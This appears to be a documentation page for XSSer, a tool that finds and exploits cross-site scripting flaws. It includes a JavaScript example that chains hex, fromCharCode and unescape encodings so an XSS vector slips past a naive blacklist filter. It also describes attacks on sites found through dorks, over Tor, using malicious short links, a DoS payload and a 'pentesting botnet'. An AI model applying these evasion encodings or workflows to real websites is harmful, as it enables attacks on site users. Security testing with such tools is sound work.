Introduction
Cross Site "Scripter" (XSSer) is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications.
It contains several options for trying to bypass certain filters, and various special code-injection techniques.
Usage
Options:
*Special Features*:
You can choose Vector(s) and Bypasser(s) to inject code with these extra special features:
*Select Target(s)*:
At least one of these options has to be specified to set the source from which target URL(s) are taken.
You need to choose one of them to run XSSer:
*Select type of HTTP/HTTPS Connection(s)*:
These options can be used to specify which parameter(s) to use as the carrier for the injected payload.
*Configure Request(s)*:
These options can be used to specify how requests to the target(s) are made.
You can select multiple:
*Select Vector(s)*:
These options can be used to specify the XSS vector source code to inject in each payload.
Use them if you don't want to inject the common XSS vector that is used by default.
Choose only one option:
*Select Bypasser(s)*:
These options can be used to encode the selected vector(s) to try to bypass anti-XSS filters in the target's code and some IPS rules, if the target uses them.
They can also be chained with each other to layer several encodings on one vector (the consumer has to undo them in reverse order):
(ex: 'Mix,Une,Str,Hex')
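The following is an added example, not code from XSSer or its authors. It re-creates in plain JavaScript the kinds of encodings the Bypasser options describe (Hex, Str for String.fromCharCode, Une for unescape()), chains them the way the Examples section's "hexadecimal, then StringFromCharCode, then hexadecimal again" mutation does, shows that a naive blacklist filter does not match the encoded form, and verifies that decoding the chain in reverse order gives back the original vector. The encoder details, the sample vector and the blacklist regex are assumptions for illustration; XSSer's own encoders may differ and "Mix" is not modelled.

```javascript
// Added example, not XSSer's code. Illustrative encoders/decoders for the
// Hex / Str / Une bypassers named on the page, plus a naive blacklist filter.

// Constructed sample vector (not taken from the page).
const SAMPLE_VECTOR = '<script>alert(1)</script>';

// --- Encoders (attacker side) ---

// Hex: percent-encode every character as %XX (or %uXXXX above 0xFF),
// which is the form the legacy unescape() accepts.
function hexEncode(s) {
  return Array.from(s, ch => {
    const code = ch.charCodeAt(0);
    return code > 0xff
      ? '%u' + code.toString(16).toUpperCase().padStart(4, '0')
      : '%' + code.toString(16).toUpperCase().padStart(2, '0');
  }).join('');
}

// Str: express the string as a String.fromCharCode(...) expression.
function strEncode(s) {
  return 'String.fromCharCode(' + Array.from(s, ch => ch.charCodeAt(0)).join(',') + ')';
}

// Une: wrap the hex form in unescape('...') so the page's own JS decodes it at run time.
function uneEncode(s) {
  return "unescape('" + hexEncode(s) + "')";
}

// --- Decoders (what the browser, or the vulnerable page's script, does with each form) ---

function hexDecode(s) {
  // Same rules as unescape(): %uXXXX first, then %XX.
  return s.replace(/%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})/g,
    (_, u, x) => String.fromCharCode(parseInt(u || x, 16)));
}

function strDecode(s) {
  const m = /^String\.fromCharCode\(([\d,]*)\)$/.exec(s);
  if (!m) throw new Error('not a String.fromCharCode() expression');
  return String.fromCharCode(...m[1].split(',').filter(Boolean).map(Number));
}

function uneDecode(s) {
  const m = /^unescape\('([^']*)'\)$/.exec(s);
  if (!m) throw new Error('not an unescape() expression');
  return hexDecode(m[1]);
}

const BYPASSERS = {
  Hex: [hexEncode, hexDecode],
  Str: [strEncode, strDecode],
  Une: [uneEncode, uneDecode],
};

// Apply a chain in order: ['Hex','Str','Hex'] hex-encodes the vector, wraps that
// in String.fromCharCode, then hex-encodes the result again.
function encodeChain(vector, chain) {
  return chain.reduce((acc, name) => BYPASSERS[name][0](acc), vector);
}

// Undo the chain in reverse order, which is the order a consumer must decode in.
function decodeChain(payload, chain) {
  return [...chain].reverse().reduce((acc, name) => BYPASSERS[name][1](acc), payload);
}

// A naive blacklist filter of the sort these encodings are meant to slip past (assumed).
const NAIVE_BLACKLIST = /<script|javascript:|on\w+\s*=/i;
function naiveFilterBlocks(s) {
  return NAIVE_BLACKLIST.test(s);
}

// Run one chain through the filter before and after decoding.
function demo(chain = ['Hex', 'Str', 'Hex']) {
  const encoded = encodeChain(SAMPLE_VECTOR, chain);
  const decoded = decodeChain(encoded, chain);
  return {
    encoded,
    blockedAsSent: naiveFilterBlocks(encoded),      // filter sees no "<script" in the encoded form
    blockedAfterDecode: naiveFilterBlocks(decoded), // the real payload is intact after decoding
    roundTrip: decoded === SAMPLE_VECTOR,
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Run it with node to print the triple-encoded payload and the filter verdicts. The point to take from it is the one the page makes: a filter that inspects the raw parameter sees only percent-escapes or a fromCharCode() call, while whatever later decodes the value (the browser, or the application's own unescape()) ends up with the original vector, so detection has to happen after the same decoding the consumer performs.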
*Special Technique(s)*:
These options can be used to try to inject code using different types of XSS techniques. You can select multiple:
*Select Final injection(s)*:
These options can be used to specify the final code to inject in vulnerable target(s). Use them if you want to exploit the vulnerabilities you discover in the wild.
Choose only one option:
*Special Final injection(s)*:
These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select multiple and combine them with your final code (except with DCP code):
*Miscellaneous*:
Examples
If you have interesting examples of XSSer usage, please send an email to the mailing list.
-------------------
* Simple injection from URL:
-------------------
* Simple injection from file, with Tor proxy and a spoofed HTTP Referer header:
-------------------
* Multiple injections from URL, with automatic payloading, using Tor proxy, encoding the payloads in hexadecimal, with verbose output and saving results to a file (XSSlist.dat):
-------------------
* Multiple injections from URL, with automatic payloading, using character-encoding mutations (first, encode the payload in hexadecimal; second, wrap the first encoding in StringFromCharCode; third, re-encode the second encoding in hexadecimal), with a spoofed HTTP User-Agent, timeout changed to "20" and multithreading (5 threads):
-------------------
* Advanced injection from file, using your own payload and Unescape() character encoding to bypass filters:
-------------------
* Injection from a dork, selecting the "duck" engine (XSSer Storm!):
-------------------
* Injection from the crawler, with crawl depth 3 and 4 pages to visit (XSSer Spider!):
-------------------
* Simple injection from URL, using POST, with statistics output:
-------------------
* Multiple injections from URL into a parameter sent with GET, with automatic payloading, IP octal obfuscation of the payload, and printing the results as a "tinyurl" shortened link (ready to share!):
-------------------
* Simple injection from URL, using GET, injecting a vector in a Cookie parameter, trying to use DOM shadow space (no server logging!) and, if any "hole" exists, applying your own final "malicious" payload (ready for real attacks!):
-------------------
* Simple injection from URL, using GET, and generating from the results a "malicious" shortened link (is.gd) carrying a working browser-side DoS (Denial of Service) payload:
-------------------
* Multiple injections to multiple places, extracting targets from a list in a file, applying automatic payloading, changing timeout to "20" and using multithreading (5 threads), increasing the delay between requests to 10 seconds, injecting into the HTTP User-Agent, HTTP Referer and Cookie parameters, using Tor proxy, with IP octal obfuscation, with statistics output, in verbose mode and creating shortened links (tinyurl) for every valid injection found (real playing mode!):
-------------------
* Injection of the user's XSS vector directly into a malicious fake image, created on the fly and ready to be uploaded.
-------------------
* Report the positive injections of a dorking search (using the "ask" dorker) directly to an XML file.
-------------------
* Publish the positive injections of a dorking search (using the "duck" dorker) directly to http://identi.ca (federated XSS pentesting botnet).
* Examples online:
-------------------
* Create a .swf movie with XSS code injected
-------------------
* Send a pre-check hash to see whether the target would generate false-positive results.
-------------------
* Multiple fuzzing injections from URL, including DCP injections, and exploiting our own code, hidden in a shortened link, on any positive results found (real-time XSS exploitation).
-------------------
* Exploiting Base64 encoding in a META tag (RFC 2397 data: URI) in a manual payload against a vulnerable target.
-------------------
* Exploiting our own remote code in a payload discovered by fuzzing, and launching it directly in a browser.
ScreenShots:
Download:http://xsser.sourceforge.net/#download